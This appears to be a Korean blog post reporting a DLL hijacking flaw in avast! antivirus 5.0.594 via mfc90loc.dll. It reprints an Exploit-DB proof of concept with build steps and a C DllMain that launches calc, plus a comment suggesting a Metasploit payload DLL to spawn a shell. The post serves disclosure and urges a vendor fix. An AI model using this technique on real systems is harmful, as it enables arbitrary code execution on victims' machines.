DLL Hijacking 취약점에 대한 자세한 사항은 아래 링크를 참고하시면 금방 이해가 되실 것으로 생각됩니다.
하여튼, 어베스트! 안티바이러스 제품의 최신 버전에서도 DLL Hijacking 취약점을 가지고 있는 것으로 알려져 있습니다. 어베스트!의 최신 버전은 V5.0.594이며, mfc90loc.dll 파일에서 이 취약점이 존재합니다. mfc90loc.dll은 라이선스 파일에 관련된 DLL 입니다.
# Exploit Title: avast! license files DLL Hijacking Exploit (mfc90loc.dll)
# Date: 25/08/2010
# Author: Bruno Filipe (diwr) http://digitalacropolis.us
# Software Link: http://www.avast.com <http://www.bsplayer.org>
# Version: <= 5.0.594
# Tested on: WinXP SP2, WinXP SP3
# Thx TheLeader ;)
#
----------------------------------------------------------------------------------------------------------
# This should work with avast license files (.avastlic)
# 1. gcc dllmain.c -o mfc90loc.dll
# 2. Put mfc90ptb.dll in the same directory of an avast license file (EG:
anything.avastlic)
# 3. You can generate a msfpayload DLL and spawn a shell, for example.
#
----------------------------------------------------------------------------------------------------------
#include <windows.h>
int main()
{
WinExec("calc", SW_NORMAL);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
main();
return 0;
}
하지만 실제적으로 어베스트!에서는 실시간 감시 및 자기 보호 기능이 월등하기 때문에 이 취약점을 직접적으로 이용하여 공격하기에는 약간 어려운 부분이 있을 수 있습니다만, 그래도 어베스트! 제작사의 빠른 대응이 필요한 시점으로 보입니다.
감사합니다.
출처: http://www.exploit-db.com/exploits/14743/
새 트위터 글
TAG AVAST,
avast antivirus,
Avast!,
avast! antivirus,
dll,
DLL Hijacking,
공짜바이러스백신,
공짜백신,
무료백신,
아바스트,
아바스트!,
어베스트,
어베스트!
